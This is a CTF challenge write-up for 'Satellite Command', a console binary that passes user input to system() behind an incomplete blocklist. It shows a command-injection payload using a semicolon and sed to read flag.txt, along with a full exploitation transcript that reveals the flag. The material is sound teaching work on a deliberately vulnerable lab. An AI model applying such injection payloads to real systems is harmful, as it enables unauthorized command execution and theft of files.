Flash CTF – Satellite Command

June 25, 2025
Challenge Writeups
2 min read

Challenge Description

You are given access to a small Satellite Command Center console that lets “authorized personnel” query the contents of several subsystems. The interface understands a handful of commands, such as statusscan <directory>help, and exit. Unfortunately, (for the satellite engineers), the console builds a shell command with improperly sanitized user input and then forwards it directly to /bin/sh. With a little bit of creativity we can abuse this behavior to execute arbitrary commands and steal the flag that exists on the satellite.

Recon & Static Analysis

  • Listing the files that ship with the challenge we find a 64-bit ELF named challenge and a Dockerfile showing how the challenge is deployed.
  • Loading the binary in tools such as stringsltrace, or a disassembler quickly reveals that the scan command eventually reaches a call to system() that looks roughly like this:
system("ls -l ./satellite/" + <sanitized_user_input> + " 2>/dev/null");

system(3) executes an entire shell command, so everything after our directory name is interpreted by the shell. The sanitization function applies a limited blocklist that disallows terms like (catbash, …) and metacharacters (|&&>, …), but the list is not nearly comprehensive enough to prevent command injection.

Notably the blacklist …

  • Still does not block the semi-colon ; that terminates a command, and
  • Only forbids a short list of commands, (catheadless, and so on). Countless other utilities such as sedawk, or printf remain permissible, so we can simply use one of those to read the flag.

Crafting a Payload

Our goal is to read flag.txt, which lives in the same directory as the binary (see the Dockerfile):

COPY ./flag.txt /srv/app/flag.txt

Complete input:

scan systems; sed -n p flag.txt

Breakdown:

  • scan systems – required prefix.
  • ; – closes the benign ls command.
  • sed -n p flag.txt – prints every line of flag.txt without using any blocked terms.

When substituted into the system() call, the binary runs

ls -l ./satellite/systems; sed -n p flag.txt 2>/dev/null

which prints the flag to our terminal.

Exploitation Walk-through

$ nc <HOST> <PORT>
    /\    
   /  \   SATELLITE COMMAND CENTER v1.337
  /____\  ================================
  |    |  Authorized Personnel Only
  |    |  
  |____|
  \/\/\/


SATCOM> Available commands:
1. status - Check satellite status
2. scan [directory] - Scan satellite directory contents
3. help - Show this help message
4. exit - Terminate connection

Available subsystems:
- systems    - Core system monitoring
- telemetry  - Orbital telemetry data
- comms      - Communication systems
- payload    - Mission payload data
- maintenance - Maintenance logs

SATCOM> scan systems; sed -n p flag.txt

[DEBUG] Executing command: ls -l ./satellite/systems; sed -n p flag.txt 2>/dev/null
[SCANNING]: systems; sed -n p flag.txt
total 8
-rwxr-xr-x    1 nobody   nobody          18 Jun 24 17:49 power.dat
-rwxr-xr-x    1 nobody   nobody         157 Jun 24 17:49 system.log
MetaCTF{a7_l3a$t_r3al_c0mm4nd_4nd_c0ntr0l_u53s_3ncryp710n}

You may also like

Sign In

Get Started